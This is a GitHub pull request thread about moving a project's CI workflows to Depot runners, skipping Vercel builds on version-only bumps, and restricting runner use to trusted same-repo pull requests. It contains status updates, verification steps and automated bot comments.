chore(ci): align runners and tighten release deploys

[anand-testcompare]

Summary

• move non-release CI, E2E, and OpenCode build/bundle/PR workflows from Blacksmith to Depot GitHub runners
• keep release/publish flows on GitHub-hosted runners for provenance/OIDC-sensitive paths
• update core GitHub Actions to the PrismantiX-era versions and teach actionlint about Depot runner labels
• make cd-release fall back to immediate merge when repo auto-merge is disabled
• skip Vercel web builds for root package.json version-only bump commits while still building on real package/dependency/script changes

Verification

• actionlint .github/workflows/*.yml
• git diff --check
• bash -n scripts/vercel-ignore-web-build.sh
• Vercel ignore simulation: 1bb539e -> 193cdbb exits 0 / skips version-only package bump
• Vercel ignore simulation: 7a87483 -> 1bb539e exits 1 / builds runtime merge
• bun x ultracite fix
• bun run check-types

Current blocker

Draft until Depot GitHub Actions runners are enabled for shpitdev/sketchi. Repo runner list is empty and org runners currently expose Blacksmith labels only, so depot-ubuntu-* jobs queue without steps.

Notes

• CodeQL default setup was disabled in GitHub settings; Sketchi does not have repo-owned CodeQL YAML and PrismantiX does not run CodeQL/Semgrep.
• This intentionally does not introduce Nx yet; it keeps Sketchi Bun/Vercel behavior while matching PrismantiX runner ergonomics where applicable.
• Existing release-please PR chore(main): release opencode-excalidraw 0.0.10 #202 was already open before this branch.

[vercel]

The latest updates on your projects. Learn more about Vercel for GitHub.

Project	Deployment	Actions	Updated (UTC)
sketchi-web	Ready	Preview, Comment	May 20, 2026 4:46am

[anand-testcompare]

Status update: this PR is intentionally draft for now.

The workflow YAML validates locally and the GitHub-hosted checks started, but every Depot-labeled job stayed queued with no steps:

• convex-tests -> depot-ubuntu-24.04-4
• opencode-excalidraw -> depot-ubuntu-24.04
• api-tests -> depot-ubuntu-24.04
• e2e -> depot-ubuntu-24.04

I checked runner availability:

• gh api repos/shpitdev/sketchi/actions/runners --paginate -> total_count: 0
• gh api orgs/shpitdev/actions/runners --paginate -> Blacksmith labels only; no depot-ubuntu-* labels

I canceled the queued runs so they do not sit indefinitely. To make this PR mergeable, install/enable Depot GitHub Actions runners for shpitdev/sketchi (including public repo runner-group access if needed), then push a no-op commit or rerun the workflows.

[anand-testcompare]

Follow-up update:

• Disabled GitHub CodeQL default setup for this repo. Confirmed via gh api repos/shpitdev/sketchi/code-scanning/default-setup: state=not-configured.
• Added fix(vercel): skip version-only package deploys (a857e93). This keeps Vercel builds for real root package.json changes, but skips automated version-only bumps like 0.7.47 -> 0.7.48.
• Verified locally:
  • bash -n scripts/vercel-ignore-web-build.sh
  • actionlint .github/workflows/*.yml
  • git diff --check
  • bun x ultracite fix
  • bun run check-types
  • Vercel ignore simulation for 1bb539e -> 193cdbb exits 0 / skips version-only bump
  • Vercel ignore simulation for 7a87483 -> 1bb539e exits 1 / builds real runtime merge

Vercel still created a preview deployment for this PR because the PR itself changes the ignore script, which is expected. I canceled the queued Depot-backed E2E runs again because Depot runner labels are still not attached to this repo.

[chatgpt-codex-connector]

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: e85c0b1c41

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

• Open a pull request for review
• Mark a draft as ready
• Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

[github-actions]

Browserbase Replays

• Session 2ab5516b-f021-4740-92c4-874f490b82a1 (scenario: visual-sanity.ts): replay | debug
• Session 451ef8ec-91e2-4929-8156-70dbd505ff44 (scenario: auth-gates.ts): replay | debug
• Session c0acb614-8cd1-4982-a0b0-ca5a36f6bd4f (scenario: opencode-web-continuity.ts): replay | debug
• Session bc018866-c63b-463f-926e-b34aa78c3044 (scenario: diagram-studio-happy-path.ts): replay | debug
• Session 59949af0-91bb-4b47-8ce3-7b4ab7a10200 (scenario: diagram-studio-occ-conflict.ts): replay | debug

Workflow run: 26141902615

[chatgpt-codex-connector]

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 65f62f8dfa

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

• Open a pull request for review
• Mark a draft as ready
• Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

[anand-testcompare]

Depot runner + security follow-up:

• Fixed the remaining GitHub org permission: the shpitdev Default runner group is now visibility=selected, includes shpitdev/sketchi, and allows_public_repositories=true. Depot's docs say managed runners register into the Default runner group, so this was the missing public-repo bit.
• Pushed 65f62f8 to lock Depot-backed PR execution down to trusted same-repo PRs only:
  • ci-tests and opencode-excalidraw-pr require head.repo.full_name == github.repository and author association of OWNER, MEMBER, or COLLABORATOR.
  • preview E2E now resolves the Vercel deployment SHA back to an associated PR and skips if there is no PR, the PR is from a fork, the author association is untrusted, or the actor is Dependabot.
• This keeps the repo public while avoiding the public-fork/self-hosted-runner/cache-poisoning shape. Depot cache is repo-scoped but not branch-isolated, so the safe stance is to keep untrusted PR code off Depot runners entirely.

Verification:

• actionlint .github/workflows/*.yml - passed
• git diff --check - passed
• bun x ultracite fix - passed, no fixes applied
• bash -n scripts/vercel-ignore-web-build.sh - passed
• bun run check-types - passed / no tasks executed by turbo
• Depot jobs now start and execute:
  • convex-tests: success on run 26137228676
  • opencode-excalidraw: success on run 26137228695
  • Vercel preview: success

Remaining blocker is not runner setup:

• e2e-api fails in real API assertions after auth/device checks pass. All diagram actions return Convex NoAuthProvider from the preview backend, e.g. diagrams.generateDiagram failed ... No auth provider found matching the given token.
• e2e-web passes visual/auth-gate smoke, then fails in authenticated continuity because the WorkOS email input did not appear. Browserbase replay was posted by the workflow.

So the Depot migration and public-runner permission path are working now. The PR is blocked on existing preview auth/E2E behavior, not on queued runners anymore.

[chatgpt-codex-connector]

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 159aa6be63

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

• Open a pull request for review
• Mark a draft as ready
• Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

[chatgpt-codex-connector]

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: de0c8323e9

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

• Open a pull request for review
• Mark a draft as ready
• Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

[chatgpt-codex-connector]

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: a637a1a8b5

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

• Open a pull request for review
• Mark a draft as ready
• Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".